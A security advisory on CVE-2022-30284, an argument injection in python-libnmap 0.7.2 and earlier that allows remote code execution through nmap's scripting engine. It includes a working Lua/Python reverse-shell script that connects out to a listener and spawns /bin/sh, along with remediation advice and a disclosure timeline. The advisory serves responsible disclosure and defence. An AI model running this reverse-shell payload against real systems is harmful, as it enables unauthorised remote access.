Security Advisory: Libnmap <= 0.7.2 (CVE-2022-30284)

Swascan Offensive Security Team has identified a severe vulnerability on the python-libnmap Python library (https://pypi.org/project/python-libnmap/).

Python-libnmap

Python-libnmap is a python library that enables python developers to manipulate nmap process and data.

The library offers the following features:

  • automate or schedule nmap scans on a regular basis
  • manipulate nmap scans results to do reporting
  • compare and diff nmap scans to generate graphs
  • batch process scan reports
  • more…

Technical Summary

Swascan Offensive Security Team discovered an important vulnerability on python-libnmap <= 0.7.2.

VulnerabilityCVSSv3.1
python-libnmap <= 0.7.2 – Argument Injection to Remote Command Execution9.0 – Critical
[AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]

This library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution through the Nmap Scripting Language (NSE).

The Swascan Offensive Security Team recommends all the developers using this Python library to check for a fixed version and to follow our recommendations reported below to make sure that the potential risk is mitigated.

Vulnerability details

Critical python-libnmap <=0.7.2 – Argument Injection to Remote Command Execution

CWE-88:                             Argument Injection
CVSSv3.1:                           9.0 [ AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H ]
OWASP:                             A03:2021 – Injection
Remediation Complexity:   HIGH

Description

The library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution.

When the client application fails to validate the user input, the library allows to inject arbitrary arguments in the final nmap command line being executed on the underlying Opearting System, leading to the upload and execution of a custom LUA script using the Nmap Scripting Language (NSE).

Proof of Concept

When spawning the nmap process, quotation is not closed correctly as shown in this PoC:

If the client application does not correctly validate the targets argument value, a potential attacker could manipulate the nmap command line as shown in the following image:

Remote Code Execution becomes then possible using the http-fetch script, and by uploading and executing the following NSE reverse shell script:

local handle = io.popen(“python3 -c ‘import sock-et,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”127.0.0.1\”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);'”)
local result = handle:read(“*a”)
handle:close()

After having uploaded the NSE reverse shell on the target system, it can be executed:

Impact

When exploited, this vulnerability can cause the access to the underlying operating system and thus to the client application’s data with the application’s user privileges.

Remediation

At the time of writing, there is still not a remediation at the library level as the developer Ronald Bister has not released an update yet. 

Developers using this Python library to make their nmap network or vulnerability scanning tasks must:

  • Update the library as soon as a newer version will be released;
  • Ensure that the targets argument value, when instantiating the NmapProcess class, is being correctly validated and does not contain invalid characters.

For a full remediation on the client application side, the targets argument value should be validated against the following use cases:

  • FQDNs
  • Simple hostnames (could be stored in /etc/hosts or completed by the domain or search suffix from resolv.conf)
  • IPv4+6
  • IPv4+6 CIDR notation
  • IPv4+6 series notation (e.g.: 192.138.5.1-5,8,9,266)

Disclosure Timeline

  • 14-02-2022: Vulnerability discovered
  • 14-02-2022: Developer contacted by email
  • 15-02-2022: Report shared with the developer
  • 16-02-2022: Developer acknownleged the vulnerability
  • 16-02-2022: CVE ID requested
  • 25-04-2022: A fix is still not available, the developer agree to publish
  • 02-05-2022: Official pubblication
  • 05-05-2022: Issued CVE ID CVE-2022-30284

Sources and references

Emotet: signature-based evasion & malleable executable
Ransomware Analysis: Black Basta

Cyber Incident Swascan Emergency

Contact us for immediate support

The undersigned, as data subject, DECLARES that I have read and understood the content of the privacy policy pursuant to Article 13, GDPR. AGREE to the processing of data in relation to the sending by the Data Controller of commercial and / or promotional communications relating to (i) own products / services, or (ii) products / services offered by third parties.
The consent given may be revoked at any time by contacting the Data Controller at the addresses provided in the aforementioned privacy policy.